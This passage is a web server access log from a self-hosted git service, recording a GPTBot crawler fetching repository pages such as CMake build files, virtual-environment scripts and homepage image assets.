[Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10016] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10675] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11187] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10009] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:17:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10364] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14919] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 64] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10273] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 10207] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:17:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:04:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10018] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10029] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10019] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" [Client 74.7.227.38] [Length 224] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:17:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:17:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9784] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" -[17/Feb/2026:17:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11371] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:17:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 842] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" -[17/Feb/2026:17:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/About.tsx" -[17/Feb/2026:17:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11580] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:17:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11566] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:17:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:17:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11569] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:17:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12180] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:17:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:17:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13543] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets?display=rendered" [Client 74.7.227.38] [Length 10954] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:17:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" -[17/Feb/2026:17:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 